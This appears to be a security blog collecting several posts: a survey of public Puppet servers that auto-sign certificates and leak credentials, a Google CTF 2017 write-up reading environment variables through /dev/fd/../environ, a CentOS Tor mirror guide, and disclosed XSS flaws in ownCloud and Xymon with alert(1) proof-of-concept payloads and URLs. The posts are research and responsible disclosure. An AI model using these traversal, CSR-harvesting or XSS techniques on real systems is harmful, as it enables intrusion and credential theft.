Looking at public Puppet servers

This is about research I did a while ago but only now had time to finally write about.

In the beginning of this year I was curious to see how many Puppet 3 servers – back then freshly end of life – were connected directly to the internet:

If you don’t know Puppet: It’s a configuration management system that contains information to deploy systems and services in your infrastructure. You write code which defines how a system should be configured e.g. which software to install, which users to deploy, how a service is configured, etc.
It typically uses a client-server model, the clients periodically pull the configuration (“catalog”) from their configured server and apply it locally. Everything is transferred over TLS encrypted connections.

Puppet uses TLS client certificates to authenticate nodes. When a client (“puppet agent”) connects for the first time to a server it will generate a key locally and submit a certificate signing request to the server.
A operator needs to sign the certificate and from that point on the agent can pull its configuration from the server.

However it’s possible to configure Puppet server to simply automatically sign all incoming CSRs.
This is obviouslyĀ not recommended to do unless you want anyone to get possibly sensitive information about your infrastructure. The Puppet documentation mentions several times that this is insecure:Ā https://docs.puppet.com/puppet/3.8/ssl_autosign.html#nave-autosigning

First I was interested if anyone is already looking for servers configured like this.
I’ve setup a honeypot Puppet server with auto-signing enabled and waited.
But after months there still was not a single CSR submitted, only port scanners tried to connect to it.

I’ve decided to look for those servers myself.
With a small script I looped over around 2500 still online servers – there were still more but due to time constraints I only checked 2500. I’ve built a system which connects to all of those systems and submits a CSR. The “certname” – this is what operators will see when reviewing CSRs – was always the same and it was pretty obvious that it is not a legitimate request.
An attacker would do more recon, get the FQDNs of the Puppet server from its certificate and try to guess a more likely name.

Out of those 2500 servers:
89 immediately signed our certificate.

Out of those 89:
50 compiled a valid catalog that could have been applied directly.
39 tried to compile a catalog and failed with issues that could potentially be worked around on the client but no time was spent on that.

It is a normal setup to have a default role. If a unknown node connects it may get only this configuration applied. Usually this deploys the Administrator user accounts and sets generic settings. This happened a lot and that is already problematic since the system accounts also get their password hash configured which now could be brute-forced. And a lot of them also conveniently send along their sudoers configuration. An attacker could target higher privileged accounts directly.
But some of those servers assigned more generic roles automatically. Exposing root SSH keys, AWS credentials,Ā configuration files of their services (Nginx, PostgreSQL, MySQL, …), tried to copy source code to it, passwords / password hashes of database and other service users:

And more. There are systems that could be immediately compromised with the information that they leak. The others at least tell attackers a lot about the system which makes further attacks much easier.

Here is where it gets interesting: One day later I connected again to the same 2500 servers using the same keys from the day before trying to retrieve a catalog. Normally we’d expect the number now to be stable or slightly less. But in this case it’s not:

145 servers allowed us to connect.
58 gave us a valid catalog that could be applied.

And one week later:
159Ā servers allowed us to connect.
63Ā gave us a valid catalog that could be applied.

Those servers were not offline during the first round either. They simply signed my CSR in the meantime without noticing that it’s none of their requests or I suspect that this is the combination of the following two items:

1) Generally when you are working with Puppet certificates you’ll be using “puppet cert $sub-command” to handle the TLS operations for you.

The problem is, that there is no way to tell it to simply reject a signing request.
You can “revoke” or “clean” certificates but it has to be signed first (see: https://tickets.puppetlabs.com/browse/PUP-1916).
There may have been an option using the “puppet ca” command, but it has been deprecated and pretty much every documentation only mentions “puppet cert” nowadays.

You are left with these options:

  • Manually figure out where the .csr file is stored on the server and remove it
  • Use the deprecated tool “puppet ca destroy $certname”
  • Run “puppet cert sign $certname && puppet cert clean $certname”
  • Run “puppet cert sign $certname && puppet cert revoke $certname”

Some are unfortunately using the last two options.

There is the possibility that on some of those systems my certificate request was signed if only for a few seconds. Which brings us to the next issue:

2) Puppet server or in some cases the reverse proxy in front of it will only read the certificate revocation list at startup time.
If you don’t restart these services after revoking a certificate, it will still be allowed to connect.

“puppet cert revoke $certname” basically only adds the certificate to the CRL. It does not remove the signed certificate from the server.
I suspect that some operators have signed and revoked my certificate but haven’t restarted the service afterwards.

On the other hand “puppet cert clean $certname” will additionally remove the signed certificate from the server, when my client connects later it cannot get the signed certificate and is locked out.
This isn’t perfect either. If the client constantly requests the certificate it could retrieve it before the “clean” ran, but it is far better than only using “revoke”.

Depending on how you use Puppet, it may be one of your most critical systems containing the keys to your kingdom. There are very few cases where it makes sense to expose a Puppet server directly to the internet.
Those systems should be the best protected systems in your infrastructure, a compromised Puppet server essentially compromises all clients that are connecting to it.

Basic or naĆÆve auto-signing should not be used in a production environment unless you can ensure that only trusted clients can reach the Puppet server. Only policy-based auto-signing or manual signing is secure otherwise.

Google CTF 2017 mindreader

This is a write-up for the Google CTF 2017 “mindreader” challenge.

The mindreader webserver presented us with only a single input form:


Pretty much with the second term entered it was clear that any filename specified in the form will be read from the local disk. This sounded like an easy challenge.
Better yet, since also /etc/shadow was displayed, this meant that the process is probably running with root privileges. Jackpot!

The logical next step was to try to fetch the usual files you’d expect to contain anything useful: Service configuration files, shell histories, any log file or pretty much anything we could think of – but nothing useful was returned.

Some files that we expected to exist like /etc/ssh/sshd_config threw a 404 and others (/proc/cpuinfo) a 403.

The HTTPS server responded with a nginx server header but there was no sign of it anywhere either. Nor of any other webserver.

With /etc/issue and /etc/debian_version the system was identified as a Debian 8.8.
Digging into the Debian specific files we grabbed /var/log/apt/history.log:

In that file it showed that those packages were all installed in a single transaction:

git mercurial pkg-config wget python-pip python2.7 python2.7-dev 
python3.4 python3.4-dev build-essential libcurl4-openssl-dev libffi-dev 
libjpeg-dev libmysqlclient-dev libpng12-dev libpq-dev libssl-dev 
libxml2-dev libxslt1-dev swig zlib1g-dev gfortran libatlas-dev 
libblas-dev libfreetype6-dev liblapack-dev libquadmath0 
libmemcached-dev libsasl2-2 libsasl2-dev libsasl2-modules sasl2-bin

Searching for that specific package list leads us to the Google Cloud Platform – Python Runtime Docker Image:
https://github.com/GoogleCloudPlatform/python-runtime/blob/master/runtime-image/resources/apt-packages.txt

This explains the absence of pretty much any other service or configuration: We are attacking a Docker container.

The Dockerfile in that repository configures a work directory of /app. With that knowledge we can get the Python source code by requesting /app/main.py:

The source code revealed two key pieces of information:

  • There is an environment variable called “FLAG” (line 6).
  • Requests containing “proc” will always return a 403 (line 24).

Coincidentally environment variables are of course stored in /proc.

The filter looked solid and pythons open() does not accept wildcards. We cannot request anything containing “proc”.

But if there is a symlink pointing to a folder inside of /proc we wouldn’t need to request a file with “proc” in its name, we could traverse from there.

Quick research in a Vagrant VM showed that /dev/fd is a symlink to /proc/self/fd.
We requested /dev/fd/../environ:


And with that we finally got the flag.

 

CentOS Tor mirror

I’m running a CentOS Tor mirror as a hidden service.
It is available under:

http://vnokiymjbiklyocz.onion/

If you want to use this mirror you must first install Tor.
Follow these instructions to do that:
https://www.torproject.org/docs/rpms.html.en

Once that is completeĀ and the Tor service is running you must install torsocks (from the EPEL repositories):

[root@localhost ~]# yum install epel-release
(...)

Complete!
[root@localhost ~]# yum install torsocks
(...)

Complete!

Afterwards change the YUM repository configuration file (/etc/yum.repos.d/CentOS-Base.repo)Ā to include the hidden service URL.
Create a backup of the file in case you want to use the normal mirrors again.
The adjusted file should look like this (on CentOS 7):

[base]
name=CentOS-$releasever - Base
baseurl=http://vnokiymjbiklyocz.onion/centos/$releasever/os/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

[updates]
name=CentOS-$releasever - Updates
baseurl=http://vnokiymjbiklyocz.onion/centos/$releasever/updates/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

[extras]
name=CentOS-$releasever - Extras
baseurl=http://vnokiymjbiklyocz.onion/centos/$releasever/extras/$basearch/
gpgcheck=1
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

[centosplus]
name=CentOS-$releasever - Plus
baseurl=http://vnokiymjbiklyocz.onion/centos/centos/$releasever/centosplus/$basearch/
gpgcheck=1
enabled=0
gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7

If you were manually editing the configuration file pleaseĀ notice that it is now using the baseurlĀ option and not theĀ mirrorlist option as before.

With this in place you can now use the hidden mirror andĀ install packages like this:

[root@localhost ~]# export TORSOCKS_LOG_LEVEL=1 # only required to stop getting spammed with warning messages
[root@localhost ~]# torsocks yum -y install bind-utils
Loaded plugins: fastestmirror
base                                                                                                                                      | 3.6 kB  00:00:00     
epel/x86_64/metalink                                                                                                                      |  26 kB  00:00:00     
epel                                                                                                                                      | 4.3 kB  00:00:00     
extras                                                                                                                                    | 3.4 kB  00:00:00     
tor/x86_64/signature                                                                                                                      |  490 B  00:00:00     
tor/x86_64/signature                                                                                                                      | 2.9 kB  00:00:00 !!! 
tor-source/signature                                                                                                                      |  490 B  00:00:00     
tor-source/signature                                                                                                                      | 2.9 kB  00:00:00 !!! 
updates                                                                                                                                   | 3.4 kB  00:00:00     
(1/9): base/7/x86_64/group_gz                                                                                                             | 155 kB  00:00:00     
(2/9): epel/x86_64/group_gz                                                                                                               | 169 kB  00:00:00     
(3/9): epel/x86_64/updateinfo                                                                                                             | 449 kB  00:00:00     
(4/9): extras/7/x86_64/primary_db                                                                                                         |  90 kB  00:00:00     
(5/9): tor-source/primary_db                                                                                                              | 2.4 kB  00:00:01     
(6/9): tor/x86_64/primary_db                                                                                                              | 4.0 kB  00:00:01     
(7/9): updates/7/x86_64/primary_db                                                                                                        | 953 kB  00:00:01     
(8/9): epel/x86_64/primary_db                                                                                                             | 3.7 MB  00:00:02     
(9/9): base/7/x86_64/primary_db                                                                                                           | 5.3 MB  00:00:05     
Determining fastest mirrors
 * epel: mirror.netcologne.de
Resolving Dependencies
--> Running transaction check
---> Package bind-utils.x86_64 32:9.9.4-29.el7_2.1 will be installed
--> Finished Dependency Resolution

Dependencies Resolved

=================================================================================================================================================================
 Package                               Arch                              Version                                        Repository                          Size
=================================================================================================================================================================
Installing:
 bind-utils                            x86_64                            32:9.9.4-29.el7_2.1                            updates                            200 k

Transaction Summary
=================================================================================================================================================================
Install  1 Package

Total download size: 200 k
Installed size: 434 k
Downloading packages:
bind-utils-9.9.4-29.el7_2.1.x86_64.rpm                                                                                                    | 200 kB  00:00:00     
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
  Installing : 32:bind-utils-9.9.4-29.el7_2.1.x86_64                                                                                                         1/1 
  Verifying  : 32:bind-utils-9.9.4-29.el7_2.1.x86_64                                                                                                         1/1 

Installed:
  bind-utils.x86_64 32:9.9.4-29.el7_2.1                                                                                                                          

Complete!

Contact me if you need any help or if you have any suggestions.

XSS in ownCloud 2

A few weeks agoĀ ownCloudĀ 4.0.0 was released and it included some cool features like encryption of uploaded files. I decided to take it for a spin again.

I foundĀ againĀ some XSS vulnerabilities. As last time, I reported these issues to the ownCloud team which responded quickly and fixed them already (with versionĀ 4.0.2). As far as I can tellĀ CVE-2012-4396 was assigned to these issues (and others were merged into it as well).

/?app=media
1) change ID3 title tag of a MP3 file to: ā€œKalimba<script>alert(1)</script>ā€
2) upload
3) play it in the integrated player, JS gets executed

Now this is fun! Imagine someone sending you a MP3 which you listen to with ownCloud and in the background your cookies are sent to a remote system. If you run a ownCloud instance with multiple users, you can also share those files. It might be enough to listen to a shared MP3 to get your account compromised, I didnā€™t verify this though.

/?app=files&getfile=download.php
1) upload picture e.g. trollface.jpg
2) rename picture to ā€œtrollf<style onload=alert(1)>ace.jpgā€
3) view the picture, JS gets executed

Canā€™t think of a good scenario for this to be useful. Maybe sharing this file.

/?app=calendar
1) add new appointment, title: ā€œXSS <script>alert(1);</script>ā€
2) switch calendar view to ā€œlistā€, JS gets executed

This was a bit surprising as the normal calendar view was not affected, only the list view.

XSS in ownCloud

A few weeks ago there was a bit of a hype about ownCloudĀ when they released version 3.0.1. I decided to give it a spin, here is what I found.

Note: I contacted the development team earlier and these vulnerabilities have been fixed in the meantime with version 3.0.2, although I have not confirmed this myself due to lack of time.

XSS in files/download.php

The attacker can send an URL to the victim and JavaScript will be executed in the victims session. The attacker does not need an account on the ownCloud instance, only knowledge about the URL path:


http://localhost/owncloud/files/download.php?file=/xss.png%3Cscript%3Ealert(1)%3C/script%3E

XSS in files/index.php

If you share your ownCloud instance with multiple users, the attacker can send an URL to the victim and JavaScript will be executed in the victims session. Both the attacker and victim need accounts on the same instance.

Here is how:

1) Create a new folder on http://localhost/owncloud/files/index.php – any name will do, I used “PoC”

2) Share this folder with your victim or the victims group

3) Switch to http://localhost/owncloud/files/index.php?dir=/PoC

4) Create a folder, called:

x"> <body onload=alert(1)><x="

5) Send that link to your victim:


http://localhost/owncloud/files/index.php?dir=/Shared/PoC/x%22%3E%20%3Cbody%20onload%3Dalert%281%29%3E%3Cx%3D%22

6) ???

7) Profit!

It may be possible to create the folder directly in /, however I couldn’t get that folder shared with other users. But since it gets automatically shared if the parent folder is shared, I didn’t invest much time into that.

XSS in apps/contacts/index.php

I found another XSS flaw in the Contacts function, creating a contact and adding this in any field:

foo"><script>alert(1)</script>

will also execute. However, since you cannot share contacts between users (or can you?) I believe this is a minor problem.

XSS in Xymon

Last week I had some time to play with the monitoring tool Xymon. Xymon is a monitoring and alerting software mostly written in C. Its server component provides you with a web-interface to check the health of your systems. I only quickly investigated this web-interface.

After walking through the various kinds of pages I found that almost all parameters are correctly checked or sanitized. But on one page the code was doing something odd (criticalview.c):

fprintf(output, "<a href="\&quot;%s&amp;NKPRIO=%d&amp;NKTTGROUP=%s&amp;NKTTEXTRA=%s\&quot;">",

hostsvcurl(itm->;hostname, colname, 1),

prio,

htmlgroupstr, htmlextrastr);

This is strange, the htmlgroupstr and htmlextrastr variables do not get used anywhere else on criticalview.c. The link it generates points to svcstatus.cĀ (well its wrapper, svcstatus.sh). On that page the NKTTGROUP and NKTTEXTRA parameters simple get displayed on the page, without any further cleanup. With that we can generate links like this:

http://localhost/xymon-cgi/svcstatus.sh?HOST=foo&SERVICE=cpu&NKPRIO=1&NKTTGROUP=admins&NKTTEXTRA=foo%3Cscript%3Ealert(1);%3C/script%3E

This nicely executes our injected JavaScript. Bug was reported at SourceForge.